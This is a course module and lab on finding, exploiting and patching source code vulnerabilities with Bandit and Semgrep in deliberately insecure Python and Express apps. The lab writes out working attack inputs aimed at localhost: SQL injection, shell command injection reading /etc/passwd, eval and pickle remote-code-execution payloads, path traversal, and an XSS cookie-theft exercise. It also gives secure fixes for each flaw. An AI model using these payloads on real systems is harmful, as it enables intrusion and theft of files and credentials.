Source Code Vulnerability Management
Objectives: By the end of this topic, you will be able to…
- Detect common vulnerabilities in real source code
- Use static analysis tools to automate code review
- Apply critical thinking to interpret and validate findings
- Exploit confirmed vulnerabilities to demonstrate their real-world impact
- Propose secure improvements to the code and verify they eliminate the attack vector
What is a vulnerability in code?
A source code vulnerability is a weakness in the logic or implementation of software that can be exploited to compromise its confidentiality, integrity, or availability. These flaws may allow an attacker to execute malicious code, access sensitive information, or alter the system’s behavior.
Main causes of vulnerabilities
Logical errors occur when the program’s logic does not account for all scenarios — for example, checking that a user is authenticated but not verifying their role before performing a sensitive action. These flaws require careful reading of intent and are often missed by automated tools.
Lack of input validation allows uncontrolled user data to reach critical functions, causing injections, logic failures, or leaks. The most common example is constructing SQL queries by concatenating strings:
# Vulnerable: attacker supplies username = "' OR '1'='1" to dump the whole table
query = "SELECT * FROM users WHERE username = '" + username + "'"
cursor.execute(query)
# Safe: parameterized query — the database never interprets user input as SQL
cursor.execute("SELECT * FROM users WHERE username = ?", (username,))Use of insecure functions introduces risk because some standard library functions perform no bounds checking. The classic case in C is strcpy, which writes until it hits a null byte regardless of the destination buffer size:
/* Vulnerable: overwrites adjacent memory if src is longer than 63 chars */
char dest[64];
strcpy(dest, src);
/* Safe: limits the copy to n-1 bytes */
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';Insecure credential management exposes secrets by embedding them directly in source code, where they end up in version control and are visible to anyone with repository access:
# Vulnerable: secret committed to the repository
DB_PASSWORD = "hunter2"
# Safe: read from the environment at runtime — never stored in code
import os
DB_PASSWORD = os.environ.get("DB_PASSWORD")Access control errors arise when code confuses authentication (confirming who the user is) with authorization (confirming what they are allowed to do). A common mistake is fetching a resource by a user-supplied ID without checking that the requester owns it:
# Vulnerable: any logged-in user can read any record by guessing its ID
def get_record(user_id, record_id):
return db.query("SELECT * FROM records WHERE id = ?", (record_id,))
# Safe: verify ownership before returning data
def get_record(user_id, record_id):
record = db.query("SELECT * FROM records WHERE id = ?", (record_id,))
if record.owner_id != user_id:
raise PermissionError("Access denied")
return recordRelevant OWASP Top 10 categories
The OWASP Top 10 lists the most critical web application vulnerabilities. Those most related to source code:
| Category | Description | Example |
|---|---|---|
| A01 — Broken Access Control | Unauthorized access to functions or data | IDOR (Insecure Direct Object Reference) |
| A03 — Injection | SQL, OS command, or other injection | Inadequate input validation |
| A07 — Auth Failures | Authentication or session management failures | Token reuse, weak passwords |
| A08 — Integrity Failures | Using compromised dependencies without verification | Libraries without hash checks |
| A09 — Logging Failures | Not logging relevant events | Ongoing attacks undetected |
| A10 — SSRF | User-controlled destination in outbound requests | Internal network scanning |
Static vs dynamic analysis
SAST (Static Application Security Testing)
SAST is performed without executing the program — it examines source or binary code directly, looking for risky patterns such as injections, information leaks, input validation errors, and insecure functions. Its main advantage is that it integrates naturally into CI/CD pipelines, catching flaws early when remediation is cheap. Its limitation is that it can generate false positives and cannot verify behavior that only emerges at runtime.
Dynamic analysis (DAST or IAST)
Dynamic analysis runs the application and observes its actual behavior — making it useful for detecting vulnerabilities that only manifest at runtime, such as race conditions or logic flaws that depend on application state. It complements static analysis rather than replacing it.
SAST tools
| Tool | Language | Description |
|---|---|---|
Bandit | Python | Reviews code for insecure practices |
Semgrep | Multi-language | Lightweight, customizable pattern detection |
Flawfinder | C/C++ | Classic tool for insecure function detection |
SonarQube | Multi-language | Supports custom rules, quality + security |
CodeQL | Multi-language | Complex pattern queries on code (GitHub) |
Brakeman | Ruby on Rails | Analysis for Rails applications |
ESLint + Security Plugins | JavaScript/TypeScript | Security-focused linting |
These tools are often integrated into CI/CD pipelines to automatically scan code on each commit or pull request.
Interpreting and validating findings
Not all findings represent a real risk: the first step is to prioritize by severity and context, evaluating whether the vulnerable code is actually reachable by untrusted input. Next, assess reproducibility — can the finding be exploited, and under what conditions? Tracing the data flow from input to the vulnerable function helps confirm whether validation is truly absent. When a genuine flaw is confirmed, apply secure coding principles to fix it without breaking surrounding logic. Finally, document every finding thoroughly so it can be reviewed, corrected, and used as a learning reference by the team.
Hands-on lab
Requirements: Kali Linux,
bandit,semgrep, Node.js
Part 0: Setting up the lab
# Install pipx
sudo apt install pipx
# Install scanner tools
pipx install bandit semgrepCreate a Semgrep account at semgrep.dev using your GitHub account.
Part 1: Python CLI tool
You are given insecure_script.py, a small Python backend utility. Your workflow for this part is: scan → exploit → patch → verify.
Step 1 — Scan. Run Bandit and save the full report:
bandit -r insecure_script.py 2>&1 | tee bandit_before.txtFor every HIGH and MEDIUM severity finding, record the line number, the Bandit rule ID, and what you think the risk is — before reading the code in depth.
Step 2 — Exploit. Run the script and work through each prompt. Do not change any code yet. Your goal is to confirm which findings represent real, triggerable vulnerabilities.
python3 insecure_script.pyUser lookup — SQL injection:
At the username prompt, enter ' OR '1'='1' --. Count the records returned and compare them to what a legitimate user should see. What did the injected condition do to the WHERE clause?
Network ping — command injection:
Enter 127.0.0.1; whoami at the host prompt. The semicolon ends the ping command and starts a new shell command. Then try 127.0.0.1; cat /etc/passwd to read a system file. Screenshot the output.
Calculator — arbitrary code execution via eval:
Enter __import__('os').system('id'). The function receives your input as a string and executes it as Python code. Record what the output reveals about the process running the script.
Session loader — pickle deserialization RCE: Pickle can encode arbitrary Python objects, including ones that run a system command when deserialized. In a separate terminal, generate a malicious payload:
python3 -c "
import pickle, os, base64
class Exploit(object):
def __reduce__(self):
return (os.system, ('id',))
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"Paste the output at the session loader prompt and observe the command execute before load_session returns.
One-time tokens — insecure randomness:
The script prints five tokens generated by random.randint. Note the approximate time. Then run the following to reproduce the same sequence:
python3 -c "
import random, time
random.seed(int(time.time()))
for _ in range(5):
print(random.randint(100000, 999999))
"random is seeded by the system clock, so an attacker who knows the generation time can predict every token issued during that second.
Hardcoded credentials — static finding: The remaining Bandit findings flag constants assigned at module level. No runtime interaction is needed — their presence in the source file means they will appear in every git commit, log, and deployment artefact. Document what each credential controls and what an attacker could do with it.
Step 3 — Patch. Fix every HIGH and MEDIUM finding. Use the table below as a guide, then write the secure version yourself:
| Vulnerability | Secure pattern |
|---|---|
| SQL injection | Parameterized queries: cursor.execute(query, (param,)) |
| Command injection | Pass arguments as a list, no shell=True: subprocess.check_output(["ping", "-c", "1", host]) |
eval / exec | Remove or replace; use ast.literal_eval only for safe literal parsing |
| Pickle deserialization | Use json for untrusted data |
| Hardcoded credentials | os.environ.get("VAR_NAME") — never store secrets in source code |
| Weak password hash | bcrypt or argon2 for passwords; hashlib.sha256 for non-secret digests |
| Insecure random | secrets.token_hex() or secrets.randbelow() for security-sensitive values |
Add a short comment to every line you change explaining what you fixed and why.
Step 4 — Verify. Rerun Bandit — it should report zero HIGH or MEDIUM findings. Then rerun the script and attempt each exploit again. Every attack should now either raise an error or produce no useful output.
bandit -r insecure_script.py 2>&1 | tee bandit_after.txt
python3 insecure_script.py? Which finding was hardest to exploit — and which was hardest to patch correctly? Did exploiting them change the order in which you prioritized the fixes?
Part 2: Node.js web application
You are given a small Express application in nodejs-app/. Your workflow is the same: scan → exploit → patch → verify.
Step 1 — Deploy and scan.
cd nodejs-app
npm install
npm start & # runs on http://localhost:3000
semgrep --config=auto app.js 2>&1 | tee semgrep_before.txtFor each Semgrep finding, record the line, the rule ID, the affected endpoint, and your hypothesis about how it could be exploited.
Step 2 — Exploit. With the server running, attack every endpoint. Screenshot or save the output of each successful exploit before changing any code.
Hardcoded secrets — static finding:
Locate the constants Semgrep flags near the top of app.js. Describe what an attacker who reads the source (or who obtains a leaked build artefact) could do with each value.
Reflected XSS — GET /hello:
Open a browser and navigate to:
http://localhost:3000/hello?name=<script>alert(document.cookie)</script>
Observe the script execute. Now craft a payload that exfiltrates the page’s cookies to an external endpoint — use Webhook.site to receive the request and confirm the data arrived.
SQL injection — GET /user:
# Return every row in the users table
curl -G --data-urlencode "username=' OR '1'='1" http://localhost:3000/user
# Target the admin record specifically
curl -G --data-urlencode "username=admin'--" http://localhost:3000/userCompare what you receive to what the endpoint is supposed to return for a normal request.
Path traversal — GET /file:
curl -G --data-urlencode "name=../../../../etc/passwd" http://localhost:3000/file
curl -G --data-urlencode "name=../../../../etc/hostname" http://localhost:3000/fileHow far outside the intended directory can you navigate? What limits you?
Command injection — GET /ping:
curl -G --data-urlencode "host=127.0.0.1; id" http://localhost:3000/ping
curl -G --data-urlencode "host=127.0.0.1; cat /etc/passwd" http://localhost:3000/pingIDOR — GET /note:
curl "http://localhost:3000/note?id=1"No authentication is required. What does this mean for a multi-user application where notes are supposed to be private?
Credentials in URL — GET /login:
curl "http://localhost:3000/login?username=admin&password=admin123"Switch to the terminal running npm start and find the request in the access log. Explain why GET parameters are a poor choice for credentials even when HTTPS is in use.
eval RCE — GET /calc:
curl -G --data-urlencode "expr=require('child_process').execSync('id').toString()" http://localhost:3000/calc
curl -G --data-urlencode "expr=require('fs').readFileSync('/etc/passwd','utf8')" http://localhost:3000/calcMissing security headers:
curl -I http://localhost:3000/helloNote which headers are absent. Look up what each missing header protects against and how the reflected XSS exploit from earlier could be partially mitigated by a correct Content-Security-Policy.
Step 3 — Patch. Fix every finding in app.js:
| Vulnerability | Secure pattern |
|---|---|
| Hardcoded secrets | process.env.VAR_NAME; document required variables in a .env.example file |
| Reflected XSS | Escape user input before inserting it into HTML; add a Content-Security-Policy header |
| SQL injection | Parameterized queries using ? placeholders: db.get(query, [param], callback) |
| Path traversal | path.resolve() the final path and assert it starts with the allowed directory |
| Command injection | Use execFile with an argument array instead of exec with a shell string |
| IDOR | Require authentication; verify the authenticated user owns the requested resource |
| Credentials in URL | Accept credentials via POST body only; never read passwords from query parameters |
eval RCE | Remove the endpoint; if a calculator is needed, use a safe math parser library |
| Missing headers | app.use(require('helmet')()) as the first middleware |
Step 4 — Verify. Stop the server, restart with the patched code, and rerun Semgrep:
pkill -f "node app.js"
npm start &
semgrep --config=auto app.js 2>&1 | tee semgrep_after.txtRerun every curl command and browser request from Step 2. Each attack must either be rejected with an appropriate error or return sanitized output. Capture a screenshot for each one.
? Which vulnerability in the web application had the largest gap between how simple it was to exploit and how much damage it could cause in a real deployment? How did your answer change after you ran the exploit versus when you only read the Semgrep finding?
Cleanup
pkill -f "node app.js"Submission
Compressed folder including:
bandit_before.txtandbandit_after.txtsemgrep_before.txtandsemgrep_after.txt- Terminal output or screenshots for every successful exploit (before patching)
- Patched
insecure_script.pyandapp.jswith explanatory comments on every changed line - Written reflection (max. 1 page): which vulnerability surprised you most once you exploited it, and why
Key concepts
| Term | Definition |
|---|---|
| SAST | Source code analysis without executing the application |
| Vulnerability | Exploitable weakness in a system or application |
| SQLi | Injection of malicious SQL code into input fields |
| XSS | Injection of malicious scripts into web pages |
| Bandit | SAST tool for Python code |
| Semgrep | Multi-language and customizable static analyzer |
| OWASP Top 10 | List of the ten most critical web vulnerabilities |